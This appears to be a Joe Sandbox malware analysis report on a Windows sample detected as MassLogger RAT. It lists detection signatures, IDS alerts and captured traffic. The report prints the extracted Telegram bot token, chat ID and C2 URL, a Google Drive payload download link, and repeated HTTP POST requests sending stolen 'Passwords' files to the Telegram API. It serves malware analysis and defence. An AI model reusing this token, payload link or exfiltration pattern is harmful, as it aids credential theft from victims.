Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ZaRP7yvL1J.exe

Overview

General Information

Sample name:ZaRP7yvL1J.exe
renamed because original name is a hash value
Original sample name:ef36fbce388a09cd4c3374d0d9dda194745f76edd41dad82e8763ed35abc0299.exe
Analysis ID:1588945
MD5:df41e72f1c096d443cefd72755df031f
SHA1:9d0b7929e7c650812071e38953d45521f8830f5e
SHA256:ef36fbce388a09cd4c3374d0d9dda194745f76edd41dad82e8763ed35abc0299
Tags:exeGuLoaderuser-adrian__luca
Infos:

Detection

MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Disable Task Manager(disabletaskmgr)
Disables CMD prompt
Disables the Windows task manager (taskmgr)
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • ZaRP7yvL1J.exe (PID: 6908 cmdline: "C:\Users\user\Desktop\ZaRP7yvL1J.exe" MD5: DF41E72F1C096D443CEFD72755DF031F)
    • ZaRP7yvL1J.exe (PID: 3052 cmdline: "C:\Users\user\Desktop\ZaRP7yvL1J.exe" MD5: DF41E72F1C096D443CEFD72755DF031F)
  • cleanup
{"C2 url": "https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA", "Telegram Chatid": "2065242915"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.2950226933.0000000035E4A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000004.00000002.2950226933.0000000035E4A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000004.00000002.2950226933.0000000035E4A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        Process Memory Space: ZaRP7yvL1J.exe PID: 3052JoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
          Process Memory Space: ZaRP7yvL1J.exe PID: 3052JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 1 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T07:32:03.547442+010020577441Malware Command and Control Activity Detected192.168.2.449968149.154.167.220443TCP
            2025-01-11T07:32:05.375843+010020577441Malware Command and Control Activity Detected192.168.2.449983149.154.167.220443TCP
            2025-01-11T07:32:07.002723+010020577441Malware Command and Control Activity Detected192.168.2.449996149.154.167.220443TCP
            2025-01-11T07:32:08.524808+010020577441Malware Command and Control Activity Detected192.168.2.450007149.154.167.220443TCP
            2025-01-11T07:32:11.383091+010020577441Malware Command and Control Activity Detected192.168.2.450016149.154.167.220443TCP
            2025-01-11T07:32:12.919988+010020577441Malware Command and Control Activity Detected192.168.2.450018149.154.167.220443TCP
            2025-01-11T07:32:16.351728+010020577441Malware Command and Control Activity Detected192.168.2.450020149.154.167.220443TCP
            2025-01-11T07:32:17.916819+010020577441Malware Command and Control Activity Detected192.168.2.450022149.154.167.220443TCP
            2025-01-11T07:32:21.217034+010020577441Malware Command and Control Activity Detected192.168.2.450024149.154.167.220443TCP
            2025-01-11T07:32:24.193404+010020577441Malware Command and Control Activity Detected192.168.2.450026149.154.167.220443TCP
            2025-01-11T07:32:27.018151+010020577441Malware Command and Control Activity Detected192.168.2.450028149.154.167.220443TCP
            2025-01-11T07:32:29.166698+010020577441Malware Command and Control Activity Detected192.168.2.450030149.154.167.220443TCP
            2025-01-11T07:32:33.677129+010020577441Malware Command and Control Activity Detected192.168.2.450032149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T07:31:52.684100+010028032742Potentially Bad Traffic192.168.2.449892193.122.6.16880TCP
            2025-01-11T07:32:02.309183+010028032742Potentially Bad Traffic192.168.2.449892193.122.6.16880TCP
            2025-01-11T07:32:04.387334+010028032742Potentially Bad Traffic192.168.2.449978193.122.6.16880TCP
            2025-01-11T07:32:06.084703+010028032742Potentially Bad Traffic192.168.2.449991193.122.6.16880TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T07:31:46.466321+010028032702Potentially Bad Traffic192.168.2.449855142.250.186.142443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T07:32:03.115558+010018100081Potentially Bad Traffic192.168.2.449968149.154.167.220443TCP
            2025-01-11T07:32:04.967289+010018100081Potentially Bad Traffic192.168.2.449983149.154.167.220443TCP
            2025-01-11T07:32:06.709751+010018100081Potentially Bad Traffic192.168.2.449996149.154.167.220443TCP
            2025-01-11T07:32:08.250052+010018100081Potentially Bad Traffic192.168.2.450007149.154.167.220443TCP
            2025-01-11T07:32:11.034010+010018100081Potentially Bad Traffic192.168.2.450016149.154.167.220443TCP
            2025-01-11T07:32:12.632554+010018100081Potentially Bad Traffic192.168.2.450018149.154.167.220443TCP
            2025-01-11T07:32:15.961929+010018100081Potentially Bad Traffic192.168.2.450020149.154.167.220443TCP
            2025-01-11T07:32:17.696802+010018100081Potentially Bad Traffic192.168.2.450022149.154.167.220443TCP
            2025-01-11T07:32:20.994975+010018100081Potentially Bad Traffic192.168.2.450024149.154.167.220443TCP
            2025-01-11T07:32:23.891363+010018100081Potentially Bad Traffic192.168.2.450026149.154.167.220443TCP
            2025-01-11T07:32:26.669545+010018100081Potentially Bad Traffic192.168.2.450028149.154.167.220443TCP
            2025-01-11T07:32:28.844046+010018100081Potentially Bad Traffic192.168.2.450030149.154.167.220443TCP
            2025-01-11T07:32:33.255971+010018100081Potentially Bad Traffic192.168.2.450032149.154.167.220443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: ZaRP7yvL1J.exeAvira: detected
            Source: 00000004.00000002.2950226933.0000000035E4A000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA", "Telegram Chatid": "2065242915"}
            Source: ZaRP7yvL1J.exe.3052.4.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendMessage"}
            Source: ZaRP7yvL1J.exeReversingLabs: Detection: 57%
            Source: ZaRP7yvL1J.exeVirustotal: Detection: 75%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_3805D1EC CryptUnprotectData,4_2_3805D1EC
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_3805D9D9 CryptUnprotectData,4_2_3805D9D9
            Source: ZaRP7yvL1J.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49913 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49855 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.129:443 -> 192.168.2.4:49866 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49968 version: TLS 1.2
            Source: ZaRP7yvL1J.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 0_2_0040672B FindFirstFileW,FindClose,0_2_0040672B
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405AFA
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_00402868 FindFirstFileW,4_2_00402868
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_0040672B FindFirstFileW,FindClose,4_2_0040672B
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405AFA
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then jmp 38050671h4_2_380503C4
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then jmp 38051042h4_2_38050C28
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then jmp 3805C985h4_2_3805C638
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then jmp 3805F2F8h4_2_3805F042
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then jmp 3805B339h4_2_3805B08A
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then jmp 3805BBE9h4_2_3805B930
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then jmp 3805C499h4_2_3805C1F2
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then jmp 3805DD40h4_2_3805DA89
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then jmp 3805E5F0h4_2_3805E33D
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then jmp 3805EEA0h4_2_3805EBF2
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then jmp 38051042h4_2_38050C1A
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then jmp 3805B791h4_2_3805B4EC
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then jmp 3805C041h4_2_3805BD88
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then jmp 3805E198h4_2_3805DEE5
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then jmp 38051042h4_2_38050F6F
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then jmp 3805EA48h4_2_3805E794
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then push 00000000h4_2_387ABDF0
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then jmp 387A882Dh4_2_387A8650
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then jmp 387A91B7h4_2_387A8650
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then jmp 387A7318h4_2_387A7070
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then jmp 387A1B00h4_2_387A1858
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then jmp 387A4ACAh4_2_387A4820
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then jmp 387A23B0h4_2_387A2108
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then jmp 387A2C60h4_2_387A29B8
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then jmp 387A3510h4_2_387A3268
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then jmp 387A54B0h4_2_387A5208
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then jmp 387A5D60h4_2_387A5AB8
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then jmp 387A6610h4_2_387A6368
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_387A7B4F
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then jmp 387A3DC0h4_2_387A3B18
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then jmp 387A4670h4_2_387A43C8
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then jmp 387A6EC0h4_2_387A6C18
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then jmp 387A16A8h4_2_387A1400
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then jmp 387A7770h4_2_387A74C8
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then jmp 387A1F58h4_2_387A1CB0
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then jmp 387A2808h4_2_387A2560
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then jmp 387A5058h4_2_387A4DB0
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then jmp 387A5908h4_2_387A5660
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then jmp 387A30B8h4_2_387A2E10
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then jmp 387A3968h4_2_387A36C0
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then jmp 387A4218h4_2_387A3F70
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then jmp 387A61B8h4_2_387A5F10
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then jmp 387A6A68h4_2_387A67C0
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then jmp 387A1250h4_2_387A0FA8
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then push 00000000h4_2_390EE7C8
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then push 00000000h4_2_390EF316
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]4_2_390EF5D8

            Networking

            barindex
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50024 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50024 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49968 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49968 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49983 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49983 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50018 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50018 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50016 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50016 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50028 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50028 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50022 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50022 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50030 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50020 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50030 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50020 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49996 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49996 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50007 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50007 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50026 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50026 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50032 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50032 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31dfbf4d9096Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31f77526aea5Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd320c50c52ce9Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd321fbad14072Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3240e3413414Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3255893946b1Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd327ea937c2a5Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3293232591ddHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32b9327f2f0cHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32dc5952d48dHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32ff5404f1e0Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3318c7ad4f72Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd333777302c9aHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
            Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49978 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49991 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49892 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49855 -> 142.250.186.142:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1KcZPYu5jgn5AxI-SG2_U0KobG5DZYAUm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1KcZPYu5jgn5AxI-SG2_U0KobG5DZYAUm&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
